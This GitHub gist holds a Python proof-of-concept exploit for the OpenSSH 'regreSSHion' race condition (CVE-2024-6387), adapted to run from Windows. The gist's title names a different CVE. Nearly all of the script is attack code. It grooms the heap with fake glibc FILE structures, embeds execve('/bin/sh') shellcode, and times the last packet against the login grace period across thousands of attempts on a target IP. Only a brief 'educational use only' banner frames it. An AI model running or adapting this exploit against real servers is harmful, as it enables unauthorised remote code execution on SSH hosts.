Created
March 19, 2026 04:50
-
-
Save siteslave/aeddba7236bb889ff47df37249cf4433 to your computer and use it in GitHub Desktop.
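CVE-2024-6387 (the gist was titled "CVE-2025-27480", but the script below identifies itself as CVE-2024-6387 throughout)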
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| """ | |
| CVE-2024-6387 PoC - Windows Fixed Version | |
| Resolves WinError 10022 and other Windows socket issues | |
| """ | |
| import socket | |
| import struct | |
| import time | |
| import sys | |
| import os | |
| import errno | |
| import select | |
| import argparse | |
| from datetime import datetime | |
| # ============================================================================ | |
| # Platform Detection & Configuration | |
| # ============================================================================ | |
| IS_WINDOWS = sys.platform.startswith('win') | |
| IS_LINUX = sys.platform.startswith('linux') | |
| MAX_PACKET_SIZE = 256 * 1024 | |
| LOGIN_GRACE_TIME = 120 | |
| # Windows-specific timing adjustments | |
| if IS_WINDOWS: | |
| TIMING_PRECISION = 0.002 | |
| SOCKET_TIMEOUT = 3.0 | |
| CONNECT_TIMEOUT = 5.0 | |
| else: | |
| TIMING_PRECISION = 0.001 | |
| SOCKET_TIMEOUT = 1.0 | |
| CONNECT_TIMEOUT = 3.0 | |
def chunk_align(size):
    """Round ``size`` up to the nearest multiple of 16.

    A value that is already a multiple of 16 is returned unchanged.
    """
    # Count the 16-byte units needed to hold ``size`` (rounding up), then
    # convert that count back into a byte size.
    units = (size + 15) >> 4
    return units << 4
| # glibc base addresses (ปรับตามเป้าหมาย) | |
| GLIBC_BASES = [0xb7200000, 0xb7400000, 0xb7600000] | |
| # Shellcode placeholder | |
| SHELLCODE = ( | |
| b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e" | |
| b"\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80\x90\x90\x90" | |
| ) | |
| # ============================================================================ | |
| # Logging Functions | |
| # ============================================================================ | |
def log(msg, level="INFO"):
    """Print ``msg`` to stdout with a millisecond timestamp and a level tag.

    Args:
        msg: Text to print.
        level: Label shown in brackets. The known labels (INFO, SUCCESS,
            WARNING, ERROR, DEBUG) are colourised with ANSI escapes on
            non-Windows platforms; any other label is printed uncoloured.
    """
    # %f yields microseconds; dropping the last three digits leaves milliseconds.
    timestamp = datetime.now().strftime("%H:%M:%S.%f")[:-3]
    colors = {
        "INFO": "\033[94m",
        "SUCCESS": "\033[92m",
        "WARNING": "\033[93m",
        "ERROR": "\033[91m",
        "DEBUG": "\033[90m",
    }
    # Colour and reset are emitted as a pair or not at all. Previously the
    # reset was suppressed on Windows while the colour code was still printed,
    # leaving raw or unterminated escape sequences in the output.
    color = "" if IS_WINDOWS else colors.get(level, "")
    reset = "\033[0m" if color else ""
    print(f"{color}[{timestamp}] [{level}] {msg}{reset}")
def log_debug(msg):
    """Log ``msg`` at DEBUG level, but only when verbose output is enabled.

    Verbosity is read from the module-level ``args`` namespace that ``main()``
    installs. If ``args`` has not been set yet (for example when this module
    is imported and a helper is called directly), the message is dropped
    instead of raising NameError.
    """
    cli_args = globals().get("args")
    if getattr(cli_args, "verbose", False):
        log(msg, "DEBUG")
| # ============================================================================ | |
| # Socket Functions - FIXED FOR WINDOWS | |
| # ============================================================================ | |
| def setup_connection(ip, port): | |
| """ | |
| Create TCP connection - FIXED to avoid WinError 10022 | |
| """ | |
| sock = None | |
| try: | |
| sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | |
| # ✅ FIXED: Set socket options BEFORE connect, and only compatible ones | |
| sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) | |
| # ❌ REMOVED: SO_EXCLUSIVEADDRUSE causes WinError 10022 on some Windows versions | |
| # if IS_WINDOWS: | |
| # sock.setsockopt(socket.SOL_SOCKET, socket.SO_EXCLUSIVEADDRUSE, 1) | |
| if IS_WINDOWS: | |
| # Windows: Use blocking mode for connect (more reliable) | |
| sock.settimeout(CONNECT_TIMEOUT) | |
| log_debug(f"Connecting to {ip}:{port}...") | |
| sock.connect((ip, port)) | |
| # Switch to non-blocking after connection established | |
| sock.setblocking(False) | |
| log_debug("Connected, switched to non-blocking mode") | |
| else: | |
| # Linux: Non-blocking connect | |
| sock.setblocking(False) | |
| result = sock.connect_ex((ip, port)) | |
| if result == 0: | |
| pass | |
| elif result == errno.EINPROGRESS: | |
| _, writable, _ = select.select([], [sock], [], CONNECT_TIMEOUT) | |
| if not writable: | |
| log("Connection timeout", "ERROR") | |
| sock.close() | |
| return None | |
| err = sock.getsockopt(socket.SOL_SOCKET, socket.SO_ERROR) | |
| if err != 0: | |
| log(f"Connection failed: {os.strerror(err)}", "ERROR") | |
| sock.close() | |
| return None | |
| else: | |
| log(f"Connect error: {os.strerror(result)}", "ERROR") | |
| sock.close() | |
| return None | |
| return sock | |
| except socket.timeout: | |
| log("Connection timeout", "ERROR") | |
| except ConnectionRefusedError: | |
| log(f"Connection refused by {ip}:{port}", "ERROR") | |
| except OSError as e: | |
| win_err = getattr(e, 'winerror', None) | |
| if win_err == 10061: | |
| log("Connection refused (WinError 10061)", "ERROR") | |
| elif win_err == 10060: | |
| log("Connection timeout (WinError 10060)", "ERROR") | |
| elif win_err == 10022: | |
| log("Invalid argument (WinError 10022) - check socket options", "ERROR") | |
| else: | |
| log(f"Socket OS error (winerror={win_err}): {e}", "ERROR") | |
| except Exception as e: | |
| log(f"setup_connection error: {type(e).__name__}: {e}", "ERROR") | |
| if sock: | |
| try: | |
| sock.close() | |
| except: | |
| pass | |
| return None | |
| def is_socket_connected(sock): | |
| """Check if socket is still connected""" | |
| if sock is None: | |
| return False | |
| try: | |
| sock.getpeername() | |
| if IS_WINDOWS: | |
| try: | |
| _, _, err = select.select([], [], [sock], 0) | |
| if err: | |
| return False | |
| except: | |
| return False | |
| return True | |
| except OSError as e: | |
| win_err = getattr(e, 'winerror', None) | |
| if win_err in [10053, 10054, 10038, 10057, 10022]: | |
| return False | |
| return False | |
| except: | |
| return False | |
| def send_packet(sock, packet_type, data, allow_partial=False): | |
| """Send SSH packet - Windows-compatible""" | |
| if not is_socket_connected(sock): | |
| log("Cannot send: socket disconnected", "ERROR") | |
| return False | |
| try: | |
| packet_len = len(data) + 5 | |
| header = struct.pack('>I', packet_len) | |
| packet = header + bytes([packet_type]) + data | |
| # Windows: Send in chunks for large packets | |
| if IS_WINDOWS and len(packet) > 16384: | |
| chunk_size = 16384 | |
| total_sent = 0 | |
| while total_sent < len(packet): | |
| chunk = packet[total_sent:total_sent + chunk_size] | |
| sent = sock.send(chunk) | |
| if sent == 0: | |
| log("Socket send returned 0", "ERROR") | |
| return False | |
| total_sent += sent | |
| if total_sent < len(packet): | |
| time.sleep(0.001) | |
| else: | |
| sock.sendall(packet) | |
| log_debug(f"Sent packet: type={packet_type}, len={len(packet)}") | |
| return True | |
| except BrokenPipeError: | |
| log("Broken pipe - server closed connection", "WARNING") | |
| return False | |
| except ConnectionResetError: | |
| log("Connection reset by peer", "WARNING") | |
| return False | |
| except ConnectionAbortedError: | |
| log("Connection aborted", "WARNING") | |
| return False | |
| except OSError as e: | |
| win_err = getattr(e, 'winerror', None) | |
| if win_err == 10053: | |
| log("[WinError 10053] Connection aborted", "WARNING") | |
| return False | |
| elif win_err == 10054: | |
| log("[WinError 10054] Connection reset", "WARNING") | |
| return False | |
| elif win_err == 10022: | |
| log("[WinError 10022] Invalid argument - socket may be invalid", "ERROR") | |
| return False | |
| elif win_err == 10035: # WSAEWOULDBLOCK | |
| if allow_partial: | |
| return True | |
| log("Socket would block", "WARNING") | |
| return False | |
| else: | |
| log(f"send_packet OSError (winerror={win_err}): {e}", "ERROR") | |
| return False | |
| except Exception as e: | |
| log(f"send_packet error: {type(e).__name__}: {e}", "ERROR") | |
| return False | |
| def recv_nonblocking(sock, bufsize, timeout=None): | |
| """Receive data with timeout""" | |
| if timeout is None: | |
| timeout = SOCKET_TIMEOUT | |
| start = time.monotonic() | |
| data = b"" | |
| while True: | |
| elapsed = time.monotonic() - start | |
| if elapsed >= timeout: | |
| break | |
| try: | |
| chunk = sock.recv(bufsize) | |
| if chunk: | |
| data += chunk | |
| break | |
| if not chunk: | |
| break | |
| except BlockingIOError: | |
| time.sleep(0.01 if IS_WINDOWS else 0.001) | |
| continue | |
| except ConnectionResetError: | |
| break | |
| except OSError as e: | |
| win_err = getattr(e, 'winerror', None) | |
| if win_err in [10053, 10054, 10022]: | |
| break | |
| elif win_err == 10035: | |
| time.sleep(0.01 if IS_WINDOWS else 0.001) | |
| continue | |
| else: | |
| break | |
| except: | |
| break | |
| return data | |
| # ============================================================================ | |
| # SSH Protocol Functions | |
| # ============================================================================ | |
| def send_ssh_version(sock): | |
| version = b"SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1\r\n" | |
| try: | |
| sock.sendall(version) | |
| return True | |
| except Exception as e: | |
| log(f"send_ssh_version error: {e}", "ERROR") | |
| return False | |
| def receive_ssh_version(sock, timeout=3.0): | |
| try: | |
| data = recv_nonblocking(sock, 256, timeout=timeout) | |
| if data: | |
| try: | |
| log(f"Received SSH version: {data.decode('ascii', errors='replace').strip()}") | |
| except: | |
| log(f"Received: {data[:50]}", "DEBUG") | |
| return True | |
| except Exception as e: | |
| log(f"receive_ssh_version error: {e}", "DEBUG") | |
| log("Failed to receive SSH version", "ERROR") | |
| return False | |
| def send_kex_init(sock): | |
| kexinit_payload = bytes(36) | |
| return send_packet(sock, 20, kexinit_payload) | |
| def receive_kex_init(sock, timeout=2.0): | |
| try: | |
| data = recv_nonblocking(sock, 2048, timeout=timeout) | |
| if data and len(data) >= 5: | |
| log(f"Received KEX_INIT ({len(data)} bytes)", "DEBUG") | |
| return True | |
| except Exception as e: | |
| log(f"receive_kex_init error: {e}", "DEBUG") | |
| return False | |
| def perform_ssh_handshake(sock): | |
| log("Performing SSH handshake...", "DEBUG") | |
| if not send_ssh_version(sock): | |
| return False | |
| if not receive_ssh_version(sock): | |
| return False | |
| if not send_kex_init(sock): | |
| return False | |
| return True | |
| # ============================================================================ | |
| # Heap Manipulation Functions | |
| # ============================================================================ | |
| def prepare_heap(sock): | |
| log("Preparing heap layout...", "DEBUG") | |
| for i in range(10): | |
| tcache_chunk = b'A' * 64 | |
| send_packet(sock, 5, tcache_chunk) | |
| for i in range(27): | |
| large_hole = b'B' * 8192 | |
| send_packet(sock, 5, large_hole) | |
| small_hole = b'C' * 320 | |
| send_packet(sock, 5, small_hole) | |
| for i in range(27): | |
| fake_data = create_fake_file_structure(4096, GLIBC_BASES[0]) | |
| send_packet(sock, 5, fake_data) | |
| large_string = b'E' * (MAX_PACKET_SIZE - 1) | |
| send_packet(sock, 5, large_string) | |
| log("Heap preparation complete", "DEBUG") | |
| def create_fake_file_structure(size, glibc_base): | |
| data = bytearray(size) | |
| struct.pack_into('<I', data, 0x88, 0x61) | |
| fake_vtable = glibc_base + 0x21b740 | |
| fake_codecvt = glibc_base + 0x21d7f8 | |
| struct.pack_into('<I', data, size - 8, fake_vtable & 0xFFFFFFFF) | |
| struct.pack_into('<I', data, size - 4, fake_codecvt & 0xFFFFFFFF) | |
| return bytes(data) | |
| # ============================================================================ | |
| # Timing Functions | |
| # ============================================================================ | |
| def measure_response_time(sock, error_type, timeout=1.0): | |
| if error_type == 1: | |
| error_packet = b"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC3" | |
| else: | |
| error_packet = b"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAAAQQDZy9" | |
| start = time.monotonic() | |
| send_packet(sock, 50, error_packet) | |
| recv_nonblocking(sock, 1024, timeout=timeout) | |
| end = time.monotonic() | |
| return end - start | |
| def time_final_packet(sock): | |
| log("Measuring packet parsing time...", "DEBUG") | |
| times = [] | |
| for error_type in [1, 2, 1, 2]: | |
| t = measure_response_time(sock, error_type) | |
| times.append(t) | |
| time.sleep(0.01) | |
| times.sort() | |
| parsing_time = (times[1] + times[2]) / 2 if len(times) >= 4 else times[0] | |
| log(f"Estimated parsing time: {parsing_time:.6f} seconds", "INFO") | |
| return parsing_time | |
| # ============================================================================ | |
| # Exploit Core Functions | |
| # ============================================================================ | |
| def create_public_key_packet(size, glibc_base): | |
| packet = bytearray(size) | |
| offset = 0 | |
| for i in range(27): | |
| large_size = chunk_align(4096) | |
| struct.pack_into('<I', packet, offset, large_size) | |
| offset += large_size | |
| small_size = chunk_align(304) | |
| struct.pack_into('<I', packet, offset, small_size) | |
| offset += small_size | |
| packet[0:8] = b"ssh-rsa " | |
| shellcode_offset = chunk_align(4096) * 13 + chunk_align(304) * 13 | |
| if shellcode_offset + len(SHELLCODE) <= size: | |
| packet[shellcode_offset:shellcode_offset+len(SHELLCODE)] = SHELLCODE | |
| for i in range(27): | |
| file_offset = chunk_align(4096) * (i + 1) + chunk_align(304) * i | |
| if file_offset + 304 <= size: | |
| fake_file = create_fake_file_structure(304, glibc_base) | |
| packet[file_offset:file_offset+304] = fake_file[:304] | |
| return bytes(packet) | |
| def attempt_race_condition(sock, parsing_time, glibc_base): | |
| log(f"Attempting race condition (glibc: 0x{glibc_base:x})...", "INFO") | |
| if not is_socket_connected(sock): | |
| log("Socket disconnected before exploit", "ERROR") | |
| return False | |
| final_packet = create_public_key_packet(MAX_PACKET_SIZE, glibc_base) | |
| try: | |
| log_debug(f"Sending packet body ({len(final_packet)-1} bytes)...") | |
| if not send_packet(sock, 5, final_packet[:-1], allow_partial=True): | |
| log("Failed to send packet body", "WARNING") | |
| return False | |
| timing_buffer = TIMING_PRECISION * 2 | |
| target_elapsed = LOGIN_GRACE_TIME - parsing_time - timing_buffer | |
| if target_elapsed < 0: | |
| log(f"Invalid timing: {target_elapsed:.3f}s", "ERROR") | |
| return False | |
| log_debug(f"Target send time: {target_elapsed:.3f}s") | |
| start = time.monotonic() | |
| while True: | |
| if not is_socket_connected(sock): | |
| log("Connection lost during timing", "WARNING") | |
| return False | |
| elapsed = time.monotonic() - start | |
| remaining = target_elapsed - elapsed | |
| if remaining <= 0: | |
| log_debug(f"Sending final byte at {elapsed:.6f}s") | |
| try: | |
| sock.sendall(final_packet[-1:]) | |
| break | |
| except OSError as e: | |
| win_err = getattr(e, 'winerror', None) | |
| if win_err == 10053: | |
| log("Connection aborted on final byte", "WARNING") | |
| return False | |
| raise | |
| except Exception as e: | |
| log(f"Error sending final byte: {e}", "ERROR") | |
| return False | |
| sleep_time = min(0.002 if IS_WINDOWS else 0.0005, max(0, remaining * 0.1)) | |
| if sleep_time > 0: | |
| time.sleep(sleep_time) | |
| log("Checking for exploitation indicators...", "DEBUG") | |
| try: | |
| sock.settimeout(0.05 if IS_WINDOWS else 0.02) | |
| response = sock.recv(1024) | |
| sock.setblocking(False) | |
| if response: | |
| log(f"Received {len(response)} bytes post-exploit", "DEBUG") | |
| if not response.startswith(b"SSH-2.0-"): | |
| log("Possible race window hit!", "SUCCESS") | |
| return True | |
| except socket.timeout: | |
| log("No response - ambiguous result", "WARNING") | |
| return True | |
| except ConnectionResetError: | |
| log("Connection reset - possible success!", "SUCCESS") | |
| return True | |
| except OSError as e: | |
| win_err = getattr(e, 'winerror', None) | |
| if win_err == 10053: | |
| log("Connection aborted post-exploit", "WARNING") | |
| return True | |
| raise | |
| except Exception as e: | |
| log(f"attempt_race_condition error: {type(e).__name__}: {e}", "ERROR") | |
| return False | |
| return False | |
| # ============================================================================ | |
| # Main Exploit Loop | |
| # ============================================================================ | |
| def exploit_target(ip, port, max_attempts=20000): | |
| log(f"Targeting {ip}:{port}", "INFO") | |
| log(f"Max attempts: {max_attempts}", "INFO") | |
| log(f"Platform: {'Windows' if IS_WINDOWS else 'Linux/Unix'}", "INFO") | |
| if IS_WINDOWS: | |
| log("⚠️ Windows detected: timing precision ~2ms", "WARNING") | |
| success = False | |
| total_attempts = 0 | |
| for base_idx, glibc_base in enumerate(GLIBC_BASES): | |
| if success: | |
| break | |
| log(f"\n[*] glibc base: 0x{glibc_base:x}", "INFO") | |
| for attempt in range(max_attempts // len(GLIBC_BASES)): | |
| total_attempts += 1 | |
| if attempt % 1000 == 0 and attempt > 0: | |
| log(f"Progress: {attempt}/{max_attempts // len(GLIBC_BASES)}", "INFO") | |
| sock = setup_connection(ip, port) | |
| if not sock: | |
| continue | |
| if not perform_ssh_handshake(sock): | |
| sock.close() | |
| continue | |
| prepare_heap(sock) | |
| parsing_time = time_final_packet(sock) | |
| if attempt_race_condition(sock, parsing_time, glibc_base): | |
| log(f"\n[!] Possible success!", "SUCCESS") | |
| log(f" Attempts: {total_attempts}", "SUCCESS") | |
| success = True | |
| break | |
| try: | |
| sock.close() | |
| except: | |
| pass | |
| time.sleep(0.1) | |
| log(f"\nComplete. Total attempts: {total_attempts}", "INFO") | |
| return success | |
| # ============================================================================ | |
| # Debug & Utility Functions | |
| # ============================================================================ | |
| def debug_connection_test(ip, port): | |
| log(f"Debug: Testing {ip}:{port}", "INFO") | |
| sock = setup_connection(ip, port) | |
| if not sock: | |
| log("Debug: Failed to connect", "ERROR") | |
| return False | |
| log("Debug: Connected", "SUCCESS") | |
| if send_ssh_version(sock): | |
| log("Debug: Sent version", "SUCCESS") | |
| else: | |
| log("Debug: Failed to send version", "ERROR") | |
| sock.close() | |
| return False | |
| response = recv_nonblocking(sock, 256, timeout=3.0) | |
| if response: | |
| log(f"Debug: Received: {response[:100]}", "INFO") | |
| else: | |
| log("Debug: No response", "WARNING") | |
| if send_packet(sock, 5, b"test"): | |
| log("Debug: Sent test packet", "SUCCESS") | |
| else: | |
| log("Debug: Failed test packet", "WARNING") | |
| sock.close() | |
| log("Debug: Complete", "INFO") | |
| return True | |
def check_target_version(ip, port):
    """Read the SSH banner from ``ip:port`` and report the OpenSSH version.

    The verdict is based on the advertised version string only. Distributions
    commonly back-port fixes without changing that string, so the result is an
    indication, not proof, in either direction.

    Args:
        ip: IPv4 address or hostname to connect to.
        port: TCP port of the SSH service.

    Returns:
        True if the connection and banner read completed (whether or not a
        version could be parsed), False if any error occurred.
    """
    log(f"Checking OpenSSH version on {ip}:{port}...", "INFO")
    # Upper bound on how much we read while waiting for the first newline, so a
    # peer that never sends one cannot make us buffer without limit.
    max_banner_bytes = 4096
    try:
        # The context manager closes the socket on every path, including when
        # connect() or recv() raises.
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
            sock.settimeout(5.0)
            sock.connect((ip, port))
            banner = b""
            while b"\n" not in banner and len(banner) < max_banner_bytes:
                chunk = sock.recv(256)
                if not chunk:
                    break
                banner += chunk
        banner_str = banner.decode('ascii', errors='replace').strip()
        log(f"Banner: {banner_str}", "INFO")
        if "OpenSSH_" in banner_str:
            version_part = banner_str.split("OpenSSH_")[1].split()[0]
            log(f"Version: {version_part}", "INFO")
            try:
                # "8.9p1" -> "8.9.1" -> (8, 9). ValueError covers non-numeric
                # components and versions with fewer than two components.
                major, minor = map(int, version_part.replace('p', '.').split('.')[:2])
                version = (major, minor)
                # Affected ranges per the public advisory: 8.5p1 up to (not
                # including) 9.8p1, and releases older than 4.4p1 unless they
                # were patched for the earlier signal-handler issues.
                if (8, 5) <= version < (9, 8) or version < (4, 4):
                    log("⚠️ MAY BE VULNERABLE", "WARNING")
                else:
                    log("✓ Appears patched", "SUCCESS")
            except ValueError:
                log("Could not parse version", "WARNING")
        return True
    except Exception as e:
        log(f"Version check error: {e}", "ERROR")
        return False
| # ============================================================================ | |
| # Entry Point | |
| # ============================================================================ | |
def parse_arguments():
    """Define the command-line interface and parse ``sys.argv``.

    Returns:
        The ``argparse.Namespace`` with ``target``, ``port``, ``attempts``,
        ``glibc``, ``check``, ``debug`` and ``verbose`` attributes.
    """
    cli = argparse.ArgumentParser(description="CVE-2024-6387 PoC (Windows-Fixed)")

    # Positional arguments; the port is optional.
    cli.add_argument("target", help="Target IP")
    cli.add_argument("port", nargs="?", type=int, default=22, help="Port (default: 22)")

    # Options that take a value. ``--glibc`` may be repeated; each value is
    # parsed as hexadecimal.
    cli.add_argument("-a", "--attempts", type=int, default=20000, help="Max attempts")
    cli.add_argument(
        "-g",
        "--glibc",
        action="append",
        type=lambda x: int(x, 16),
        help="glibc base (hex)",
    )

    # Boolean switches, registered in the same order as they appear in --help.
    switches = (
        ("-c", "--check", "Check version only"),
        ("-d", "--debug", "Debug connection"),
        ("-v", "--verbose", "Verbose output"),
    )
    for short_flag, long_flag, description in switches:
        cli.add_argument(short_flag, long_flag, action="store_true", help=description)

    return cli.parse_args()
| def main(): | |
| global args | |
| args = parse_arguments() | |
| if args.glibc: | |
| GLIBC_BASES[:] = args.glibc | |
| if args.debug: | |
| return 0 if debug_connection_test(args.target, args.port) else 1 | |
| if args.check: | |
| return 0 if check_target_version(args.target, args.port) else 1 | |
| print("=" * 70) | |
| print("CVE-2024-6387 regreSSHion - Windows-Fixed PoC") | |
| print("=" * 70) | |
| print("[!] EDUCATIONAL USE ONLY") | |
| print("[!] Use in authorized environments only") | |
| print("=" * 70) | |
| try: | |
| result = exploit_target(args.target, args.port, max_attempts=args.attempts) | |
| return 0 if result else 1 | |
| except KeyboardInterrupt: | |
| log("\nInterrupted", "INFO") | |
| return 130 | |
| except Exception as e: | |
| log(f"Fatal: {type(e).__name__}: {e}", "ERROR") | |
| if args.verbose: | |
| import traceback | |
| traceback.print_exc() | |
| return 2 | |
| if __name__ == "__main__": | |
| sys.exit(main()) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment